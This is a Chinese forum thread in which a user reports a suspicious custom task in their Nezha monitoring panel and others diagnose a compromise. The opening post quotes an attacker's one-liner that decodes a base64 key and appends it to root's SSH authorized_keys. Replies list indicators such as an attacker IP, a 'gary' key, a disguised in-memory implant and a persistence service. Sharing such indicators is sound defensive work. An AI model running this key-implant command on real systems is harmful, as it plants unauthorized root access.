帮我看看我的nezha是不是被黑了

linuschen 2026-06-16 13:50 1

mkdir -p /root/.ssh && chmod 700 /root/.ssh && K="$(echo xxxx= | base64 -d)" && grep -qxF "$K" /root/.ssh/authorized_keys 2>/dev/null || printf "\n%s\n" "$K" >> /root/.ssh/authorized_keys && chmod 600 /root/.ssh/authorized_keys

今天打开探针后台看到一个自定义的任务 看上去好像很危险

我也没公开过我的网站啊 怎么回事


顺便问问大佬们 探针的小鸡会不会有事情?

最新回复 (11)
  • treasureu 06-16 13:52
    1

    我也没公开过照样被攻入了

  • banana6585 06-16 13:52
    2

    这很明显是在植入 SSH 公钥吧 ^-^

  • 小毛驴 06-16 13:55
    3

    写入了指定SSH公钥,赶紧换吧。

  • linuschen 楼主 06-16 14:14
    4

    大佬们 探针的小鸡会不会有事情?

  • a1m67 06-16 14:21
    5

    大佬发的


    目前已知,欢迎补充:

    攻击者植入的完整 payload(四层,现已全清):

    ① 哪吒后门 Agent(连 207.58.173.192)

    ② gary@gary SSH 后门公钥

    ③ memfd 内存马(伪装 kworker,连 24.x)

    ④ SystemLoger 守护服务(连 24.x,负责复活)


    我让龙虾检测的,前两条都中了

  • linuschen 楼主 06-16 15:28
    6

    @a1m67 #5

    我子机器也中招了 直接重装了

  • treasureu 06-16 15:29
    7

    @a1m67 #5 我发的,其实只需要排查一下ssh里有没有gary这个公钥就基本能判断了

  • hide3110 06-16 15:47
    8

    @treasureu #7 是不是就是查看下vps的公钥里有没有多出一个公钥,并且名称是gary的?

  • treasureu 06-16 15:55
    9

    @hide3110 #8 对,你可以进去看一下有没有,如果多了一条gary那就可以肯定了,直接按照这个帖子的办法清理或者直接重装https://www.nodeseek.com/post-778967-1

  • hide3110 06-16 16:05
    10

    @treasureu #9 多谢,现在就去排查一下

  • windsand 06-16 16:07
    11

    207.58.173.192 只要有连接这个就是被黑了

* 帖子来源NodeSeek
返回